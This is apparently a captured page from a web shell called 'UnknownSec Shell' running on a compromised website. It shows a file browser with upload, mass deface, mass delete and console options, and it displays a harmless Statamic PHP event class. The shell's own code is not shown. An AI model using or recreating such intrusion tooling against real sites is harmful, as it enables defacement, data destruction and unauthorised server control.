shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Events
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
UserRegistering.php
<?php namespace Statamic\Events; class UserRegistering extends Event { public $user; public function __construct($user) { $this->user = $user; } /** * Dispatch the event with the given arguments, and halt on first non-null listener response. * * @return mixed */ public static function dispatch() { return event(new static(...func_get_args()), [], true); } }
© 2026 UnknownSec